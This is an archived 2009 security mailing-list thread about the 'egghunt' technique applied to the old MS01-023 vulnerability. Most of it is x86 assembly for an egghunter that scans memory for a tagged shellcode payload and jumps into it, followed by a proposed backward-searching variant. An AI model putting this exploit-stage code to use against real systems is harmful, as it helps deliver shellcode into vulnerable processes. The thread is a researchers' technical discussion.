Dailydave mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Merry Xmas & Happy "Search Memory for you Shellcode"...

From: "Nelson Brito" <nbrito () sekure org>
Date: Wed, 23 Dec 2009 12:36:33 -0200
What if?

        inc_page:
                and             dx, 0FFFFF000h  ; add PAGE_SIZE-1 to edx
        inc_byte:
                dec             edx                     ; decrement our pointer
by one

Have anyone tested this yet???

/*
 * $Id: .siganture,v 1.3 2009-12-11 09:22:54-02 nbrito Exp $
 *
 * Author: Nelson Brito <nbrito [at] sekure [dot] org> 
 
   Copyright(c) 2004-2009 Nelson Brito. All rights reserved worldwide.
   http://fnstenv.blogspot.com */



-----Original Message-----
From: Nelson Brito [mailto:nbrito () sekure org]
Sent: Wednesday, December 23, 2009 12:16 PM
To: 'dailydave () lists immunityinc com'
Subject: Merry Xmas & Happy "Search Memory for you Shellcode"...

Hey, fellows.

I am get some spare time to work with a well-known technique called
"egghunt", based on skape excellent article "Safely Searching Process
Virtual Address Space" (http://www.hick.org/code/skape/papers/egghunt-
shellcode.pdf).

But while trying to perform this technique on a really old vulnerability
(MS01-023) the egghunt doesn't work as good as I was expecting.

The code:
win32_syscall_forward_01 PROC
      start:
              xor             edx, edx                ; zeroing the edx, it is
necessary to avoid BO in 'Release'
      inc_page:
              or              dx, 0FFFh               ; add PAGE_SIZE-1 to edx
      inc_byte:
              inc             edx                     ; increment our pointer

by one

      setup_syscall:
              push    edx                             ; save edx on the stack
              push    +02h                            ; push

NtAccessCheckAndAuditAlarm

              pop             eax                     ; pop into eax
              int             2Eh                     ; perform the syscall
(KiSystemService())
              cmp             al, 05h         ; did we get 0xc0000005
(STATUS_ACCESS_VIOLATION)?
              pop             edx                     ; restore edx
              je              inc_page                ; yes, invalid pointer,

go to the

next page
      setup_badge:
              mov             eax, "NBNB"             ; throw our badge in eax
      check_badge:
              mov             edi, edx                ; set edi to the pointer

we

validated
              scasd                                   ; compare the dword in

edi to eax

              jnz             inc_byte                ; no match? increment

the pointer

by one
              scasd                                   ; compare the dword in

edi to eax

again - which is now eax + 3
              jnz             inc_byte                ; no match? increment

the pointer

by one
      badge_found:
              jmp             edi                     ; found the badge, jump

8 bytes

past it into our code
win32_syscall_forward_01 ENDP

Well, I called this "forward" because it will try to find the code from
"the place" BO happens to the end of STACK. Am I right?

But in this vulnerability the stager shellcode will be placed in somewhere
on the BUTTOM of the STACK, right?

/*
 * $Id: .siganture,v 1.3 2009-12-11 09:22:54-02 nbrito Exp $
 *
 * Author: Nelson Brito <nbrito [at] sekure [dot] org>

   Copyright(c) 2004-2009 Nelson Brito. All rights reserved worldwide.
   http://fnstenv.blogspot.com */



_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave
Previous By Date Next
Previous By Thread Next

Current thread: